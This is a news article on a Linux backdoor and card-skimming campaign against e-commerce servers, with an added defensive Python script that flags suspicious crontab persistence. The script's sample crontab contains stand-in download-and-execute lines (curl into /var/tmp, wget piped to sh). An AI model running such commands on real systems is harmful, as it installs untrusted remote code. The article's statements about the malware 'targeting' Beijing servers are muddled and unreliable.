
Hackers targeting e-commerce sites using Linux backdoor


Last Updated on 26/11/2021 by Anamika

Reportedly, cybercriminals are now running a new hacking campaign that uses a Linux backdoor on e-commerce websites. It includes deploying a credit card skimmer on the websites.

Researchers at Sansec Threat Research found a new malicious agent named linux_avp, which is known to hide as a system process on e-commerce website servers.

The hackers have been deploying this malware since mid-November and are targeting the control servers in Beijing.

The attackers' main aim in using the Linux backdoor is to find weaknesses in various e-commerce websites and make the websites vulnerable at once, causing major harm.

“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a web shell and modified the server code to intercept customer data” 

According to the reports of ITPro

The malware also has a way to get back into servers after it has been removed or the server has been rebooted. It uses a malicious crontab entry, and it then downloads the Golang malware to a random writable directory and executes it, which further installs two configuration files.
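A defender can look for the persistence pattern described above by auditing crontab entries. The following is an added example, not code from Sansec or from the original article: the directory list, the heuristics and the sample crontab (with `example.invalid` hosts) are constructed assumptions.

```python
import re

# Assumed list of directories that are commonly writable by any local user.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da)?sh\b")
MACROS = {"@reboot", "@hourly", "@daily", "@weekly", "@monthly", "@yearly", "@annually"}

def cron_command(line):
    """Return the command of a user-crontab line; None for comments, blanks, env settings."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if re.match(r"^[A-Za-z_][A-Za-z0-9_]*\s*=", line):
        return None                      # e.g. MAILTO=..., PATH=...
    first, _, rest = line.partition(" ")
    if first in MACROS:
        return rest.strip() or None
    parts = line.split(None, 5)          # five schedule fields, then the command
    return parts[5] if len(parts) == 6 else None

def findings(command):
    """List the reasons a cron command resembles download-and-execute persistence."""
    reasons = []
    if DOWNLOADERS.search(command):
        if PIPE_TO_SHELL.search(command):
            reasons.append("download piped to shell")
        if any(d in command for d in WRITABLE_DIRS):
            reasons.append("download into writable directory")
    # Split into simple commands and check what each one actually runs.
    segments = [s.split() for s in re.split(r"&&|\|\||[;|&]", command) if s.strip()]
    if any(seg[0].startswith(WRITABLE_DIRS) for seg in segments):
        reasons.append("executes file from writable directory")
    return reasons

def audit(crontab_text):
    """Map 1-based line numbers to findings for every suspicious entry."""
    report = {}
    for number, line in enumerate(crontab_text.splitlines(), start=1):
        command = cron_command(line)
        hits = findings(command) if command else []
        if hits:
            report[number] = hits
    return report

SAMPLE = """# constructed sample crontab, not taken from the incident
MAILTO=ops@example.invalid
15 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -s http://cdn.example.invalid/u -o /var/tmp/.u; chmod +x /var/tmp/.u; /var/tmp/.u
@reboot wget -qO- http://cdn.example.invalid/i | sh
0 * * * * /dev/shm/worker --quiet
"""
```

Run `audit()` over the output of `crontab -l` for each account, including the web server user; system crontabs under `/etc/cron.d` carry an extra user field that this parser does not handle.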

The malware is affecting a lot of e-commerce websites at large, but it is still not clear why it is targeting only the servers from Beijing.

Anamika
Anamika focuses on data privacy, data policy, digital policies, and puts users' privacy first. She loves exploring new tech and spends time looking around business politics and its impact on users and small businesses.